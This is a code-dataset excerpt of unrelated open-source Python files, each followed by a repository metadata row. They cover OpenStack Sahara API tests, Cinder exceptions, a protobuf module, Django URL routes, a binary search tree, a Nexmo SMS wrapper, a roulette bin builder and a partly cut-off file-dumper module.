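    flag_map = {'!': 'not', '+': 'all', '|': 'any', '^': 'one_of'}
    groups = {'not': [], 'all': [], 'any': [], 'one_of': []}
    for term in terms:
        group = flag_map.get(term[:1])
        if group is None:
            # Unprefixed terms behave like '|' terms; OR is the default.
            groups['any'].append(term)
        else:
            groups[group].append(term[1:])
    return groups
if __name__ == '__main__':
    print(_demo_group_mixed_terms(['+~in the beg*', '!was', '^light', '^dark']))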
|
zepto/biblesearch.web
|
sword_search.old/search.py
|
Python
|
gpl-3.0
| 146,124 | 0.000561 |
# Copyright (c) 2015 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest import mock
import oslo_messaging
import six
import testtools
from sahara import conductor as cond
from sahara import context
from sahara import exceptions as exc
from sahara.plugins import base as pl_base
from sahara.plugins import provisioning as pr_base
from sahara.service import api as service_api
from sahara.service.api import v10 as api
from sahara.tests.unit import base
from sahara.utils import cluster as c_u
conductor = cond.API
SAMPLE_CLUSTER = {
'plugin_name': 'fake',
'hadoop_version': 'test_version',
'tenant_id': 'tenant_1',
'name': 'test_cluster',
'user_keypair_id': 'my_keypair',
'node_groups': [
{
'auto_security_group': True,
'name': 'ng_1',
'flavor_id': '42',
'node_processes': ['p1', 'p2'],
'count': 1
},
{
'auto_security_group': False,
'name': 'ng_2',
'flavor_id': '42',
'node_processes': ['p3', 'p4'],
'count': 3
},
{
'auto_security_group': False,
'name': 'ng_3',
'flavor_id': '42',
'node_processes': ['p3', 'p4'],
'count': 1
}
],
'cluster_configs': {
'service_1': {
'config_2': 'value_2'
},
'service_2': {
'config_1': 'value_1'
}
},
}
SCALE_DATA = {
'resize_node_groups': [
{
'name': 'ng_1',
'count': 3,
},
{
'name': 'ng_2',
'count': 2,
}
],
'add_node_groups': [
{
'auto_security_group': True,
'name': 'ng_4',
'flavor_id': '42',
'node_processes': ['p1', 'p2'],
'count': 1
},
]
}
class FakePlugin(pr_base.ProvisioningPluginBase):
_info = {}
name = "fake"
def __init__(self, calls_order):
self.calls_order = calls_order
def configure_cluster(self, cluster):
pass
def start_cluster(self, cluster):
pass
def get_description(self):
return "Some description"
def get_title(self):
return "Fake plugin"
def validate(self, cluster):
self.calls_order.append('validate')
def get_open_ports(self, node_group):
self.calls_order.append('get_open_ports')
def validate_scaling(self, cluster, to_be_enlarged, additional):
self.calls_order.append('validate_scaling')
def get_versions(self):
return ['0.1', '0.2']
def get_node_processes(self, version):
return {'HDFS': ['namenode', 'datanode']}
def get_configs(self, version):
return []
def recommend_configs(self, cluster, scaling=False):
self.calls_order.append('recommend_configs')
class FakePluginManager(pl_base.PluginManager):
def __init__(self, calls_order):
super(FakePluginManager, self).__init__()
self.plugins['fake'] = FakePlugin(calls_order)
class FakeOps(object):
def __init__(self, calls_order):
self.calls_order = calls_order
def provision_cluster(self, id):
self.calls_order.append('ops.provision_cluster')
conductor.cluster_update(
context.ctx(), id, {'status': c_u.CLUSTER_STATUS_ACTIVE})
def provision_scaled_cluster(self, id, to_be_enlarged):
self.calls_order.append('ops.provision_scaled_cluster')
# Set scaled to see difference between active and scaled
for (ng, count) in six.iteritems(to_be_enlarged):
conductor.node_group_update(context.ctx(), ng, {'count': count})
conductor.cluster_update(context.ctx(), id, {'status': 'Scaled'})
def terminate_cluster(self, id):
self.calls_order.append('ops.terminate_cluster')
class TestApi(base.SaharaWithDbTestCase):
def setUp(self):
super(TestApi, self).setUp()
self.calls_order = []
self.override_config('plugins', ['fake'])
pl_base.PLUGINS = FakePluginManager(self.calls_order)
service_api.setup_api(FakeOps(self.calls_order))
oslo_messaging.notify.notifier.Notifier.info = mock.Mock()
self.ctx = context.ctx()
@mock.patch('sahara.service.quotas.check_cluster', return_value=None)
def test_create_cluster_success(self, check_cluster):
cluster = api.create_cluster(SAMPLE_CLUSTER)
self.assertEqual(1, check_cluster.call_count)
result_cluster = api.get_cluster(cluster.id)
self.assertEqual(c_u.CLUSTER_STATUS_ACTIVE, result_cluster.status)
expected_count = {
'ng_1': 1,
'ng_2': 3,
'ng_3': 1,
}
ng_count = 0
for ng in result_cluster.node_groups:
self.assertEqual(expected_count[ng.name], ng.count)
ng_count += 1
self.assertEqual(3, ng_count)
api.terminate_cluster(result_cluster.id)
self.assertEqual(
['get_open_ports', 'recommend_configs', 'validate',
'ops.provision_cluster',
'ops.terminate_cluster'], self.calls_order)
@mock.patch('sahara.service.quotas.check_cluster', return_value=None)
def test_create_multiple_clusters_success(self, check_cluster):
MULTIPLE_CLUSTERS = SAMPLE_CLUSTER.copy()
MULTIPLE_CLUSTERS['count'] = 2
clusters = api.create_multiple_clusters(MULTIPLE_CLUSTERS)
self.assertEqual(2, check_cluster.call_count)
result_cluster1 = api.get_cluster(clusters['clusters'][0])
result_cluster2 = api.get_cluster(clusters['clusters'][1])
self.assertEqual(c_u.CLUSTER_STATUS_ACTIVE, result_cluster1.status)
self.assertEqual(c_u.CLUSTER_STATUS_ACTIVE, result_cluster2.status)
expected_count = {
'ng_1': 1,
'ng_2': 3,
'ng_3': 1,
}
ng_count = 0
for ng in result_cluster1.node_groups:
self.assertEqual(expected_count[ng.name], ng.count)
ng_count += 1
self.assertEqual(3, ng_count)
api.terminate_cluster(result_cluster1.id)
api.terminate_cluster(result_cluster2.id)
self.assertEqual(
['get_open_ports', 'recommend_configs', 'validate',
'ops.provision_cluster',
'get_open_ports', 'recommend_configs', 'validate',
'ops.provision_cluster',
'ops.terminate_cluster',
'ops.terminate_cluster'], self.calls_order)
@mock.patch('sahara.service.quotas.check_cluster')
def test_create_multiple_clusters_failed(self, check_cluster):
MULTIPLE_CLUSTERS = SAMPLE_CLUSTER.copy()
MULTIPLE_CLUSTERS['count'] = 2
check_cluster.side_effect = exc.QuotaException(
'resource', 'requested', 'available')
with testtools.ExpectedException(exc.QuotaException):
            api.create_multiple_clusters(MULTIPLE_CLUSTERS)
self.assertEqual('Error', api.get_clusters()[0].status)
@mock.patch('sahara.service.quotas.check_cluster')
def test_create_cluster_failed(self, check_cluster):
check_cluster.side_effect = exc.QuotaException(
'resource', 'requested', 'available')
with testtools.ExpectedException(exc.QuotaException):
api.create_cluster(SAMPLE_CLUSTER)
self.assertEqual('Error', api.get_clusters()[0].status)
@mock.patch('sahara.service.quotas.check_cluster', return_value=None)
@mock.patch('sahara.service.quotas.check_scaling', return_value=None)
def test_scale_cluster_success(self, check_scaling, check_cluster):
cluster = api.create_cluster(SAMPLE_CLUSTER)
api.scale_cluster(cluster.id, SCALE_DATA)
result_cluster = api.get_cluster(cluster.id)
self.assertEqual('Scaled', result_cluster.status)
expected_count = {
'ng_1': 3,
'ng_2': 2,
'ng_3': 1,
'ng_4': 1,
}
ng_count = 0
for ng in result_cluster.node_groups:
self.assertEqual(expected_count[ng.name], ng.count)
ng_count += 1
self.assertEqual(4, ng_count)
api.terminate_cluster(result_cluster.id)
self.assertEqual(
['get_open_ports', 'recommend_configs', 'validate',
'ops.provision_cluster', 'get_open_ports', 'get_open_ports',
'recommend_configs', 'validate_scaling',
'ops.provision_scaled_cluster',
'ops.terminate_cluster'], self.calls_order)
@mock.patch('sahara.service.quotas.check_cluster', return_value=None)
@mock.patch('sahara.service.quotas.check_scaling', return_value=None)
def test_scale_cluster_failed(self, check_scaling, check_cluster):
cluster = api.create_cluster(SAMPLE_CLUSTER)
check_scaling.side_effect = exc.QuotaException(
'resource', 'requested', 'available')
with testtools.ExpectedException(exc.QuotaException):
api.scale_cluster(cluster.id, {})
def test_cluster_update(self):
with mock.patch('sahara.service.quotas.check_cluster'):
cluster = api.create_cluster(SAMPLE_CLUSTER)
updated_cluster = api.update_cluster(
cluster.id, {'description': 'Cluster'})
self.assertEqual('Cluster', updated_cluster.description)
def test_get_plugin(self):
# processing to dict
data = api.get_plugin('fake', '0.1').dict
self.assertIsNotNone(data)
self.assertEqual(
len(pr_base.list_of_common_configs()), len(data.get('configs')))
self.assertEqual(['fake', '0.1'], data.get('required_image_tags'))
self.assertEqual(
{'HDFS': ['namenode', 'datanode']}, data.get('node_processes'))
self.assertIsNone(api.get_plugin('fake', '0.3'))
data = api.get_plugin('fake').dict
self.assertIsNotNone(data.get('version_labels'))
self.assertIsNotNone(data.get('plugin_labels'))
del data['plugin_labels']
del data['version_labels']
self.assertEqual({
'description': "Some description",
'name': 'fake',
'title': 'Fake plugin',
'versions': ['0.1', '0.2']}, data)
self.assertIsNone(api.get_plugin('name1', '0.1'))
def test_update_plugin(self):
data = api.get_plugin('fake', '0.1').dict
self.assertIsNotNone(data)
updated = api.update_plugin('fake', values={
'plugin_labels': {'enabled': {'status': False}}}).dict
self.assertFalse(updated['plugin_labels']['enabled']['status'])
updated = api.update_plugin('fake', values={
'plugin_labels': {'enabled': {'status': True}}}).dict
self.assertTrue(updated['plugin_labels']['enabled']['status'])
# restore to original status
updated = api.update_plugin('fake', values={
'plugin_labels': data['plugin_labels']}).dict
self.assertEqual(data['plugin_labels']['enabled']['status'],
updated['plugin_labels']['enabled']['status'])
|
openstack/sahara
|
sahara/tests/unit/service/api/test_v10.py
|
Python
|
apache-2.0
| 11,635 | 0 |
from cinder.exception import *
from cinder.i18n import _
class ProviderMultiVolumeError(CinderException):
    msg_fmt = _("More than one provider_volume was found for volume %(volume_id)s")
class ProviderMultiSnapshotError(CinderException):
    msg_fmt = _("More than one provider_snapshot was found for snapshot %(snapshot_id)s")
class ProviderCreateVolumeError(CinderException):
    msg_fmt = _("volume %(volume_id)s create request failed: network or provider internal error")
class ProviderCreateSnapshotError(CinderException):
    msg_fmt = _("snapshot %(snapshot_id)s create request failed: network or provider internal error")
class ProviderLocationError(CinderException):
msg_fmt = _("provider location error")
class ProviderExportVolumeError(CinderException):
msg_fmt = _("provider export volume error")
class ProviderVolumeNotFound(NotFound):
message = _("Volume %(volume_id)s could not be found.")
class VgwHostNotFound(NotFound):
message = _("node of %(Vgw_id)s at provider cloud could not be found.")
|
hybrid-storage-dev/cinder-fs-111t-hybrid-cherry
|
volume/drivers/ec2/exception_ex.py
|
Python
|
apache-2.0
| 1,031 | 0.012609 |
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: tensorflow_serving/config/platform_config.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import any_pb2 as google_dot_protobuf_dot_any__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='tensorflow_serving/config/platform_config.proto',
package='tensorflow.serving',
syntax='proto3',
serialized_options=_b('\370\001\001'),
serialized_pb=_b('\n/tensorflow_serving/config/platform_config.proto\x12\x12tensorflow.serving\x1a\x19google/protobuf/any.proto\"E\n\x0ePlatformConfig\x12\x33\n\x15source_adapter_config\x18\x01 \x01(\x0b\x32\x14.google.protobuf.Any\"\xc5\x01\n\x11PlatformConfigMap\x12T\n\x10platform_configs\x18\x01 \x03(\x0b\x32:.tensorflow.serving.PlatformConfigMap.PlatformConfigsEntry\x1aZ\n\x14PlatformConfigsEntry\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\x31\n\x05value\x18\x02 \x01(\x0b\x32\".tensorflow.serving.PlatformConfig:\x02\x38\x01\x42\x03\xf8\x01\x01\x62\x06proto3')
,
dependencies=[google_dot_protobuf_dot_any__pb2.DESCRIPTOR,])
_PLATFORMCONFIG = _descriptor.Descriptor(
name='PlatformConfig',
full_name='tensorflow.serving.PlatformConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='source_adapter_config', full_name='tensorflow.serving.PlatformConfig.source_adapter_config', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=98,
serialized_end=167,
)
_PLATFORMCONFIGMAP_PLATFORMCONFIGSENTRY = _descriptor.Descriptor(
name='PlatformConfigsEntry',
full_name='tensorflow.serving.PlatformConfigMap.PlatformConfigsEntry',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='tensorflow.serving.PlatformConfigMap.PlatformConfigsEntry.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='tensorflow.serving.PlatformConfigMap.PlatformConfigsEntry.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=_b('8\001'),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=277,
serialized_end=367,
)
_PLATFORMCONFIGMAP = _descriptor.Descriptor(
name='PlatformConfigMap',
full_name='tensorflow.serving.PlatformConfigMap',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='platform_configs', full_name='tensorflow.serving.PlatformConfigMap.platform_configs', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_PLATFORMCONFIGMAP_PLATFORMCONFIGSENTRY, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=170,
serialized_end=367,
)
_PLATFORMCONFIG.fields_by_name['source_adapter_config'].message_type = google_dot_protobuf_dot_any__pb2._ANY
_PLATFORMCONFIGMAP_PLATFORMCONFIGSENTRY.fields_by_name['value'].message_type = _PLATFORMCONFIG
_PLATFORMCONFIGMAP_PLATFORMCONFIGSENTRY.containing_type = _PLATFORMCONFIGMAP
_PLATFORMCONFIGMAP.fields_by_name['platform_configs'].message_type = _PLATFORMCONFIGMAP_PLATFORMCONFIGSENTRY
DESCRIPTOR.message_types_by_name['PlatformConfig'] = _PLATFORMCONFIG
DESCRIPTOR.message_types_by_name['PlatformConfigMap'] = _PLATFORMCONFIGMAP
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
PlatformConfig = _reflection.GeneratedProtocolMessageType('PlatformConfig', (_message.Message,), dict(
DESCRIPTOR = _PLATFORMCONFIG,
__module__ = 'tensorflow_serving.config.platform_config_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.serving.PlatformConfig)
))
_sym_db.RegisterMessage(PlatformConfig)
PlatformConfigMap = _reflection.GeneratedProtocolMessageType('PlatformConfigMap', (_message.Message,), dict(
PlatformConfigsEntry = _reflection.GeneratedProtocolMessageType('PlatformConfigsEntry', (_message.Message,), dict(
DESCRIPTOR = _PLATFORMCONFIGMAP_PLATFORMCONFIGSENTRY,
__module__ = 'tensorflow_serving.config.platform_config_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.serving.PlatformConfigMap.PlatformConfigsEntry)
))
,
DESCRIPTOR = _PLATFORMCONFIGMAP,
__module__ = 'tensorflow_serving.config.platform_config_pb2'
# @@protoc_insertion_point(class_scope:tensorflow.serving.PlatformConfigMap)
))
_sym_db.RegisterMessage(PlatformConfigMap)
_sym_db.RegisterMessage(PlatformConfigMap.PlatformConfigsEntry)
DESCRIPTOR._options = None
_PLATFORMCONFIGMAP_PLATFORMCONFIGSENTRY._options = None
# @@protoc_insertion_point(module_scope)
|
diplomacy/research
|
diplomacy_research/proto/tensorflow_serving/config/platform_config_pb2.py
|
Python
|
mit
| 6,119 | 0.00621 |
from django.conf.urls import url
from DjangoTaskManager.task import views
urlpatterns = [
url(r'^$', views.all_tasks, name='all_tasks'),
url(r'^add/$', views.add, name='task_add'),
url(r'^mark-done/(?P<task_id>[\w+:-]+)/$',
views.mark_done, name='task_mark_done'),
url(r'^edit/(?P<task_id>[\w+:-]+)/$',
views.edit, name='task_edit'),
url(r'^delete/(?P<task_id>[\w+:-]+)/$',
views.delete, name='task_delete'),
url(r'^single/(?P<task_id>[\w+:-]+)/$',
views.single, name='single_task'),
]
|
MaxwellCoriell/DjangoTaskManager
|
DjangoTaskManager/task/urls.py
|
Python
|
mit
| 544 | 0 |
class Node(object):
#a binary search tree has a left node (smaller values) and a right node (greater values)
def __init__(self, data):
self.data = data;
self.left_child = None;
self.right_child = None;
class BinarySearchTree(object):
def __init__(self):
self.root = None;
#inserting items in the tree O(logN) running time
def insert(self, data):
#if the root node is NULL it means this is the first node we insert
if not self.root:
self.root = Node(data);
else:
#there are already nodes in the tree so we have to find the valid place for this node
self.insert_node(data, self.root);
#it has O(logN) running time if the tree is balanced -> it can reduce to O(N)
#thats why AVL trees or red-black trees are needed
def insert_node(self, data, node):
#the data is smaller so we have to go to the left subtree
if data < node.data:
#the left child is not a NULL so we keep going
if node.left_child:
self.insert_node(data, node.left_child);
#the left child is NULL so we can insert the data here
else:
node.left_child = Node(data);
#the data is greater so we have to go to the right subtree
else:
#the right child is not a NULL so we keep going
if node.right_child:
self.insert_node(data, node.right_child);
#the right child is NULL so we can insert the data here
else:
node.right_child = Node(data);
#if the tree is balanced then it has O(logN) running time
def remove_node(self, data, node):
#base case for recursive function calls
if not node:
return node;
#first we have to find the node to remove
        #left node -> contains smaller value
        #right node -> contains greater value
if data < node.data:
node.left_child = self.remove_node(data, node.left_child);
elif data > node.data:
node.right_child = self.remove_node(data, node.right_child);
#this is when we find the node we want to remove
else:
#the node is a leaf node: no children at all
if not node.left_child and not node.right_child:
print("Removing a leaf node...");
del node;
return None;
#the node we want to remove has a single right child
if not node.left_child: # node !!!
print("Removing a node with single right child...");
temp_node = node.right_child;
del node;
return temp_node;
#the node we want to remove has a single left child
elif not node.right_child: # node instead of self
print("Removing a node with single left child...");
temp_node = node.left_child;
del node;
return temp_node;
#the node has both left and right children
print("Removing node with two children....");
temp_node = self.get_predecessor(node.left_child); # self instead of elf + get predecessor
node.data = temp_node.data;
node.left_child = self.remove_node(temp_node.data, node.left_child);
#this is how we notify the parent and update the children accordingly
return node;
    #get the previous node in the in-order traversal
    def get_predecessor(self, node):
        #the predecessor is the largest node in the left subtree
#successor: the smallest node in the right subtree
if node.right_child:
return self.get_predecessor(node.right_child);
return node;
#of course if the root is a NULL: we can not remove nodes at all
def remove(self, data):
if self.root:
self.root = self.remove_node(data, self.root);
#it has O(logN) running time complexity
def get_min_value(self):
if self.root:
return self.get_min(self.root);
def get_min(self, node):
#smallest item is the left most node's value
if node.left_child:
return self.get_min(node.left_child);
return node.data;
#it has O(logN) running time complexity
def get_max_value(self):
if self.root:
return self.get_max(self.root);
def get_max(self, node):
#largest item is the right most node's value
if node.right_child:
return self.get_max(node.right_child);
return node.data;
#considering all the nodes in the tree IF there are items (so root node is not NULL)
def traverse(self):
if self.root:
self.traverse_in_order(self.root);
#considering all the items in O(N) running time
#it yields the natural order (numerical ordering or alphabetical ordering)
def traverse_in_order(self, node):
#visit the left subtree
if node.left_child:
self.traverse_in_order(node.left_child);
#then the root node of the subtree
print("%s " % node.data);
#then finally the right subtree recursively
if node.right_child:
self.traverse_in_order(node.right_child);
if __name__ == "__main__":
bst = BinarySearchTree();
bst.insert(10);
bst.insert(13);
bst.insert(5);
bst.insert(14);
bst.remove(13);
bst.traverse();
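    # --- Illustrative extension, not part of the original demo --------------
    # Exercise the remaining removal branch described in the comments above:
    # removing a node with two children swaps in its in-order predecessor
    # (the largest value in the left subtree), and the min/max helpers walk
    # the left-most/right-most chains.
    bst.insert(7);
    bst.insert(12);
    bst.remove(10);   # root has two children -> predecessor (7) replaces it
    bst.traverse();   # prints 5, 7, 12, 14
    print("min: %s  max: %s" % (bst.get_min_value(), bst.get_max_value()));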
|
prk327/CoAca
|
Algo - DataStru/bst.py
|
Python
|
gpl-3.0
| 4,916 | 0.058381 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from decimal import Decimal as D
class NexmoResponse(object):
"""A convenient wrapper to manipulate the Nexmo json response.
The class makes it easy to retrieve information about sent messages, total
price, etc.
Example::
>>> response = nexmo.send_sms(frm, to, txt)
>>> print response.total_price
0.15
>>> print response.remaining_balance
1.00
>>> print response.message_count:
3
>>> for message in response.messages:
... print message.message_id, message.message_price
00000124 0.05
00000125 0.05
00000126 0.05
    The class only handles successful responses, since errors raise
exceptions in the :class:`~Nexmo` class.
"""
def __init__(self, json_data):
self.messages = [NexmoMessage(data) for data in json_data['messages']]
self.message_count = len(self.messages)
self.total_price = sum(msg.message_price for msg in self.messages)
self.remaining_balance = min(msg.remaining_balance for msg in self.messages)
class NexmoMessage(object):
"""A wrapper to manipulate a single `message` entry in a Nexmo response.
    When a text message is sent in several parts, Nexmo will return a status
    for each and every one of them.
    The class does nothing more than wrap the json data for easy
    access.
"""
def __init__(self, json_data):
data = {
'to': json_data['to'],
'message_id': json_data['message-id'],
'status': int(json_data['status']),
'remaining_balance': D(json_data['remaining-balance']),
'message_price': D(json_data['message-price']),
'network': json_data['network']
}
self.__dict__.update(data)
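# --- Illustrative usage sketch, not part of the original module -------------
# A hand-written payload in the shape Nexmo's JSON response takes, used only
# to show how NexmoResponse aggregates per-message prices and balances; all
# numbers and identifiers below are made up.
if __name__ == '__main__':
    sample = {
        'messages': [
            {'to': '447700900000', 'message-id': '00000124', 'status': '0',
             'remaining-balance': '1.00', 'message-price': '0.05',
             'network': '23410'},
            {'to': '447700900000', 'message-id': '00000125', 'status': '0',
             'remaining-balance': '0.95', 'message-price': '0.05',
             'network': '23410'},
        ]
    }
    response = NexmoResponse(sample)
    print('%s messages, total %s, balance %s' % (
        response.message_count, response.total_price,
        response.remaining_balance))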
|
thibault/libnexmo
|
libnexmo/response.py
|
Python
|
mit
| 1,868 | 0.000535 |
#PROJECT
from outcome import Outcome
from odds import Odds
class Bin:
def __init__(
self,
*outcomes
):
        self.outcomes = set(outcomes)
def add_outcome(
self,
outcome
):
self.outcomes.add(outcome)
def __str__(self):
return ', '.join([str(outcome) for outcome in self.outcomes])
class BinBuilder:
def __init__(
self,
wheel
):
self.wheel = wheel
def build_bins(self):
self.straight_bets()
self.split_bets()
self.street_bets()
self.corner_bets()
self.five_bet()
self.line_bets()
self.dozen_bets()
self.column_bets()
self.even_money_bets()
def straight_bets(self):
outcomes = [
Outcome(str(i), Odds.STRAIGHT_BET)
for i in range(37)
] + [Outcome('00', Odds.STRAIGHT_BET)]
for i, outcome in enumerate(outcomes):
self.wheel.add_outcome(i, outcome)
def split_bets(self):
for row in range(12):
for direction in [1, 2]:
n = 3 * row + direction
bins = [n, n + 1]
outcome = Outcome(
'split {}'.format('-'.join([str(i) for i in bins])),
Odds.SPLIT_BET
)
for bin in bins:
self.wheel.add_outcome(bin, outcome)
for n in range(1, 34):
bins = [n, n + 3]
outcome = Outcome(
'split {}'.format('-'.join([str(i) for i in bins])),
Odds.SPLIT_BET
)
for bin in bins:
self.wheel.add_outcome(bin, outcome)
def street_bets(self):
for row in range(12):
n = 3 * row + 1
bins = [n, n + 1, n + 2]
outcome = Outcome(
'street {}-{}'.format(bins[0], bins[-1]),
Odds.STREET_BET
)
for bin in bins:
self.wheel.add_outcome(bin, outcome)
def corner_bets(self):
for col in [1, 2]:
for row in range(11):
n = 3 * row + col
bins = [n + i for i in [0, 1, 3, 4]]
outcome = Outcome(
'corner {}'.format('-'.join([str(i) for i in bins])),
Odds.CORNER_BET
)
for bin in bins:
self.wheel.add_outcome(bin, outcome)
def five_bet(self):
outcome = Outcome(
'five bet 00-0-1-2-3',
Odds.FIVE_BET
)
for bin in [0, 1, 2, 3, 37]:
self.wheel.add_outcome(bin, outcome)
def line_bets(self):
for row in range(11):
n = 3 * row + 1
bins = [n + i for i in range(6)]
outcome = Outcome(
'line {}-{}'.format(bins[0], bins[-1]),
Odds.LINE_BET
)
for bin in bins:
self.wheel.add_outcome(bin, outcome)
def dozen_bets(self):
#https://pypi.python.org/pypi/inflect/0.2.4
dozen_map = {
1: '1st',
2: '2nd',
3: '3rd'
}
for d in range(3):
outcome = Outcome(
'{} 12'.format(dozen_map[d + 1]),
Odds.DOZEN_BET
)
for m in range(12):
self.wheel.add_outcome(12 * d + m + 1, outcome)
def column_bets(self):
for c in range(3):
outcome = Outcome(
'column {}'.format(c + 1),
Odds.COLUMN_BET
)
for r in range(12):
self.wheel.add_outcome(3 * r + c + 1, outcome)
def even_money_bets(self):
for bin in range(1, 37):
if 1 <= bin < 19:
name = '1 to 18' #low
else:
name = '19 to 36' #high
self.wheel.add_outcome(
bin,
Outcome(name, Odds.EVEN_MONEY_BET)
)
if bin % 2:
name = 'odd'
else:
name = 'even'
self.wheel.add_outcome(
bin,
Outcome(name, Odds.EVEN_MONEY_BET)
)
if bin in (
[1, 3, 5, 7, 9] +
[12, 14, 16, 18] +
[19, 21, 23, 25, 27] +
[30, 32, 34, 36]
):
name = 'red'
else:
name = 'black'
self.wheel.add_outcome(
bin,
Outcome(name, Odds.EVEN_MONEY_BET)
)
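# --- Illustrative sketch, not part of the original module -------------------
# BinBuilder only needs an object exposing add_outcome(bin_index, outcome),
# so a throwaway stand-in is enough to show how the builder fills all 38 bins
# (0-36 plus '00' stored at index 37).  _StubWheel is invented for this demo;
# the project's real Wheel class lives in another module.
if __name__ == '__main__':
    class _StubWheel(object):
        def __init__(self):
            self.bins = dict((i, set()) for i in range(38))
        def add_outcome(self, bin_index, outcome):
            self.bins[bin_index].add(outcome)
    wheel = _StubWheel()
    BinBuilder(wheel).build_bins()
    print('outcomes in bin 1: %d, bin 0: %d, bin 00: %d' % (
        len(wheel.bins[1]), len(wheel.bins[0]), len(wheel.bins[37])))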
|
ddenhartog/itmaybeahack-roulette
|
bin.py
|
Python
|
mit
| 4,662 | 0.000858 |
from django.conf.urls import include, url
from django.conf import settings
from django.contrib import admin
from djgeojson.views import GeoJSONLayerView
from wagtail.contrib.wagtailsitemaps.views import sitemap
from wagtail.wagtailadmin import urls as wagtailadmin_urls
from wagtail.wagtaildocs import urls as wagtaildocs_urls
from wagtail.wagtailcore import urls as wagtail_urls
from waespk.core import urls as ossuo_urls
urlpatterns = [
url(r'^django-admin/', include(admin.site.urls)),
url(r'^admin/', include(wagtailadmin_urls)),
url(r'^documents/', include(wagtaildocs_urls)),
url(r'^sitemap\.xml$', sitemap),
]
if settings.DEBUG:
from django.conf.urls.static import static
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from django.views.generic import TemplateView, RedirectView
# Serve static and media files from development server
urlpatterns += staticfiles_urlpatterns()
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
# Add views for testing 404 and 500 templates
urlpatterns += [
url(r'^test404/$', TemplateView.as_view(template_name='404.html')),
url(r'^test500/$', TemplateView.as_view(template_name='500.html')),
]
# Favicon
urlpatterns += [
url(r'^favicon\.ico$', RedirectView.as_view(url=settings.STATIC_URL + 'ossuo.com/images/favicon.ico')),
]
urlpatterns += [
url(r'', include(ossuo_urls)),
url(r'', include(wagtail_urls)),
]
handler404 = 'waespk.core.views.error404'
|
spketoundi/CamODI
|
waespk/urls.py
|
Python
|
mit
| 1,548 | 0.001292 |
#!/usr/bin/python
# -*- coding: iso-8859-15 -*-
#
# module_dumper.py - WIDS/WIPS framework file dumper module
# Copyright (C) 2009 Peter Krebs, Herbert Haas
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License version 2 as published by the
# Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, see http://www.gnu.org/licenses/gpl-2.0.html
"""Dumper module
Test module that writes any input values to a file.
"""
# Imports
#
# Custom modules
import fw_modules.module_template
from fw_modules.module_exceptions import *
# Standard modules
import time
# Third-party modules
class DumperClass(fw_modules.module_template.ModuleClass):
"""DumperClass
Receives messages and dumps them into file.
"""
def __init__(self, controller_reference, parameter_dictionary, module_logger):
"""Constructor
"""
fw_modules.module_template.ModuleClass.__init__(self, controller=controller_reference, param_dict=parameter_dictionary, logger=module_logger)
# Default values.
try:
self.dumpfile_path = self.param_dict['dumpfile']
except KeyError:
            self.module_logger.error("No dumpfile specified")
            raise FwModuleSetupError, self.module_identifier + ": ERROR: No dumpfile specified"
# Helper values.
self.DUMPFILE = None
def after_run(self):
"""after_run()
Closes dumpfile.
"""
try:
self.DUMPFILE.close()
except IOError:
self.module_logger.warning("Couldn't close dumpfile properly")
def before_run(self):
"""before_run()
Opens dumpfile.
"""
try:
self.DUMPFILE = open(self.dumpfile_path, "w")
except IOError:
self.module_logger.error("Couldn't open file " + str(self.dumpfile_path))
return False
else:
return True
def dump_to_file(self, data):
"""dump_to_file()
Dumps input to file.
"""
self.module_logger.debug("Dumped data: " + str(data))
try:
self.DUMPFILE.write(data + "\n")
self.DUMPFILE.flush()
except IOError as err:
